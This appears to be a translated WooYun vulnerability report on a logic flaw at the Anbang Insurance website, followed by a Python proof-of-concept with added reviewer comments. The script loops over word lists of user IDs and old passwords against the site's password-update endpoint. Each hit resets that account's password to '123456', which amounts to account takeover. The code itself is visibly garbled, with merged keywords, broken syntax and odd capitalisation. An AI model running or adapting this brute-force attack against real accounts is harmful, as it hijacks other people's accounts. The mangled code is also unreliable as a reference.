Vulnerability report:
The Anbang Insurance Group site has a logic flaw: user IDs can be enumerated and user passwords brute-forced, allowing a user's password to be reset (script included)
http://www.wooyun.org/bugs/wooyun-2010-0119851
The proof-of-concept script is as follows:
Keywords: logic flaw, web request, nested loops
#!/usr/bin/python
#Coding:utf-8
ImportSys
ImportUrllib
ImportUrllib2
#Build the fixed set of request headers sent with every guess.
#DT is the length of the already-encoded POST body; it is written into
#Content-length by hand rather than left to the HTTP library.
#NOTE(review): every value here is a constant, so all requests from this
#script share one Host/User-Agent/Cookie fingerprint; server-side, many
#requests with an identical header set is a simple signal to alert on.
defGet_headers (DT):
headers = {
'Accept':'*/*',
'X-requested-with':'XMLHttpRequest',
'user-agent':'mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/41.0.2272.76 safari/537.36',
'Connection':'keep-alive',
'Content-type':'application/x-www-form-urlencoded',
'Host':'www.ab95569.com',
'Content-length': DT,
'accept-encoding':'gzip, deflate',
'Accept-language':'zh-cn,zh;q=0.8',
'Cookies':'pgv_pvi=9633317888'
}
returnHeaders
#Try every (old password, user id) pair from the two word lists against the
#password-update endpoint. Nothing is returned; a hit is only printed.
#NOTE(review): the client chooses userId itself and the request carries no
#session cookie beyond a fixed tracking value, so the flaw this page describes
#is presumably that the server trusts the posted userId instead of the
#authenticated session — only the client side is visible here, confirm.
#A "hit" is not a passive check: on success the server has already replaced
#that user's password with the constant newpwd, so each hit shows up
#server-side as a completed password change, not just a failed login.
defGuess_password (Oldpwd,userid):
forIinchOLDPWD:
forJinchUserid:
#Body: the guessed oldpwd, a constant newpwd and the client-chosen userId.
params = Urllib.urlencode ({'oldpwd'I'newpwd':'123456','userId': J})
DT = Len (params)
headers = get_headers (DT)
Try:
URL ='http://www.ab95569.com/user/updPwd.htm'
req = Urllib2. Request (Url,params,headers=headers)
#3-second timeout per request; a slow server raises and is reported below.
Response = Urllib2.urlopen (req,timeout=3)
data = Response.read ()
#The response body is the only success oracle: this substring means the
#password was changed for (J, i).
if'saved successfully'inchData
Print'userid:%s, oldpwd:%s'% (J,i)
#Any failure (timeout, HTTP error, connection error) is printed and the
#next pair is tried; no request is ever retried or rate-limited.
exceptException, E:
PrintE
#Read one candidate password per line from filename1 and return them as a
#list, with surrounding whitespace (including the newline) stripped.
#NOTE(review): the file handle is never closed; a `with open(...)` block
#would release it deterministically.
def get_oldpwd (filename1):
Temp1 = []
Files = open (filename1,'r')
for i in Files:
i = I.strip ()
Temp1.append (i)
return Temp1
#Read one user id per line from filename2 and return them as a list, with
#surrounding whitespace stripped. Same shape as get_oldpwd above.
#NOTE(review): the file handle is never closed here either; the mode string
#is 'R' as printed, which differs from get_oldpwd's 'r' — presumably a
#transcription artefact of this listing rather than intent.
defGet_userid (filename2):
TEMP2 = []
Files = open (filename2,'R')
forIinchFiles
i = I.strip ()
Temp2.append (i)
returnTemp2
#Entry point: load the password list and the user-id list from two files in
#the working directory, then run the nested guessing loop over both.
if__name__=="__main__":
Oldpwd = Get_oldpwd ('Password.txt')
UserID = Get_userid ('Userid.txt')
Guess_password (Oldpwd,userid)
A Python script for password brute-forcing via the Anbang logic flaw